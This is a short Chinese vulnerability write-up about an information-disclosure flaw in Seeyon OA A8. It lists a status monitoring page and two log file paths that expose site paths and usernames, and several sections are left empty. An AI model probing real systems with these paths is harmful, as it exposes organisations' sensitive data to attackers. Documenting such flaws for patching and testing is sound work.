# 致远OA A8 status.jsp 信息泄露漏洞

# 漏洞描述

致远OA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击

# 漏洞影响


# 网络测绘


# 漏洞复现

访问监控页面

/seeyon/management/status.jsp
1

img



/seeyon/management/status.jsp
/seeyon/logs/login.log
/seeyon/logs/v3x.log
1
2
3

img

img

img